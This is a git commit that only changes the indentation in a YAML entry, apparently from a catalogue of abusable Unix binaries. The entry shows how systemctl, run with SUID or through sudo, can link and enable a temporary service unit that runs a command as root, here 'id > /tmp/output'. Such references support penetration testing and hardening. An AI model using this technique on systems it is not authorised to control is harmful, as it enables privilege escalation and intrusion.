Drop useless echo indentation
This commit is contained in:
@@ -4,20 +4,20 @@ functions:
|
||||
- code: |
|
||||
TF=$(mktemp).service
|
||||
echo '[Service]
|
||||
Type=oneshot
|
||||
ExecStart=/bin/sh -c "id > /tmp/output"
|
||||
[Install]
|
||||
WantedBy=multi-user.target' > $TF
|
||||
Type=oneshot
|
||||
ExecStart=/bin/sh -c "id > /tmp/output"
|
||||
[Install]
|
||||
WantedBy=multi-user.target' > $TF
|
||||
./systemctl link $TF
|
||||
./systemctl enable --now $TF
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp).service
|
||||
echo '[Service]
|
||||
Type=oneshot
|
||||
ExecStart=/bin/sh -c "id > /tmp/output"
|
||||
[Install]
|
||||
WantedBy=multi-user.target' > $TF
|
||||
Type=oneshot
|
||||
ExecStart=/bin/sh -c "id > /tmp/output"
|
||||
[Install]
|
||||
WantedBy=multi-user.target' > $TF
|
||||
sudo systemctl link $TF
|
||||
sudo systemctl enable --now $TF
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user